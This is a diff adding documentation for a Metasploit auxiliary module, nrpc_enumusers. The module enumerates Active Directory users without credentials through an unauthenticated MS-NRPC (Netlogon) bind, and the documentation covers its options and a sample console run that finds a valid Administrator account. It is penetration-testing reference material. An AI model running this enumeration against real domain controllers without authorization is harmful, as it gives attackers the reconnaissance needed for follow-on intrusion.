|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +A new method for gathering domain users. The method leverages auth-level = 1 (No authentication) against the |
| 4 | +MS-NRPC (Netlogon) interface on domain controllers. All that's required is the domain controller's IP address, |
| 5 | +and the entire process can be completed without providing any credentials. |
| 6 | + |
| 7 | +## Verification Steps |
| 8 | + |
| 9 | +1. Do: `use auxiliary/gather/nrpc_enumusers` |
| 10 | +2. Do: `set RHOSTS <targer IP addresses>` |
| 11 | +3. Do: `set USER_FILE <path to your users list>` |
| 12 | +4. Do: `run` |
| 13 | + |
| 14 | + |
| 15 | +## Target |
| 16 | + |
| 17 | +To use nrpc_enumusers, make sure you are able to connect to the Domain Controller. |
| 18 | +It has been tested with Windows servers 2012, 2016, 2019 and 2022 |
| 19 | + |
| 20 | +## Options |
| 21 | + |
| 22 | +1- `USER_FILE` (required) |
| 23 | + |
| 24 | +**Description:** Path to the file containing the list of usernames to enumerate. Each username should be on a separate line. |
| 25 | + |
| 26 | +**Usage:** Provide the path to the file that contains the list of user accounts you want to test. |
| 27 | + |
| 28 | +**Example:** `set USER_FILE /path/to/usernames.txt` |
| 29 | + |
| 30 | +2- `RHOSTS` (required) |
| 31 | + |
| 32 | +**Description:** The target IP address or range of IP addresses of the Domain Controllers. |
| 33 | + |
| 34 | +**Usage:** Specify the IP address or addresses of the Domain Controllers you are targeting. |
| 35 | + |
| 36 | +**Example:** `set RHOSTS 192.168.1.100` |
| 37 | + |
| 38 | +3- `RPORT` (optional) |
| 39 | + |
| 40 | +**Description:** The port for the MS-NRPC interface. If not specified, the module will attempt to determine the endpoint. |
| 41 | + |
| 42 | +**Usage:** If you know the port used by the MS-NRPC interface, you can specify it. Otherwise, the module will find it automatically. |
| 43 | + |
| 44 | +**Example:** `set RPORT 49664` |
| 45 | + |
| 46 | +## Scenarios |
| 47 | + |
| 48 | +The following demonstrates basic usage, using a custom wordlist, |
| 49 | +targeting a single Domain Controller to identify valid domain user accounts. |
| 50 | + |
| 51 | +Create a new `./users.txt` file, then run the module: |
| 52 | + |
| 53 | +``` |
| 54 | +msf6 auxiliary(gather/nrpc_enumusers) > set RHOSTS 192.168.177.177 |
| 55 | +RHOSTS => 192.168.177.177 |
| 56 | +msf6 auxiliary(gather/nrpc_enumusers) > set USER_FILE users.txt |
| 57 | +USER_FILE => users.txt |
| 58 | +msf6 auxiliary(gather/nrpc_enumusers) > run |
| 59 | +
|
| 60 | +[*] 192.168.177.177: - Connecting to the endpoint mapper service... |
| 61 | +[*] 192.168.177.177: - Binding to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.177.177[49664]... |
| 62 | +[-] 192.168.177.177: - Tiffany.Molina does not exist |
| 63 | +[-] 192.168.177.177: - SMITH does not exist |
| 64 | +[-] 192.168.177.177: - JOHNSON does not exist |
| 65 | +[-] 192.168.177.177: - WILLIAMS does not exist |
| 66 | +[-] 192.168.177.177: - Administratorsvc_ldap does not exist |
| 67 | +[-] 192.168.177.177: - svc_ldap does not exist |
| 68 | +[-] 192.168.177.177: - ksimpson does not exist |
| 69 | +[+] 192.168.177.177: - Administrator exists |
| 70 | +[-] 192.168.177.177: - James does not exist |
| 71 | +[-] 192.168.177.177: - nikk37 does not exist |
| 72 | +[-] 192.168.177.177: - svc-printer does not exist |
| 73 | +[-] 192.168.177.177: - SABatchJobs does not exist |
| 74 | +[-] 192.168.177.177: - e.black does not exist |
| 75 | +[-] 192.168.177.177: - Kaorz does not exist |
| 76 | +[*] 192.168.177.177: - Scanned 1 of 1 hosts (100% complete) |
| 77 | +[*] Auxiliary module execution completed |
| 78 | +msf6 auxiliary(gather/nrpc_enumusers) > |
| 79 | +``` |
0 commit comments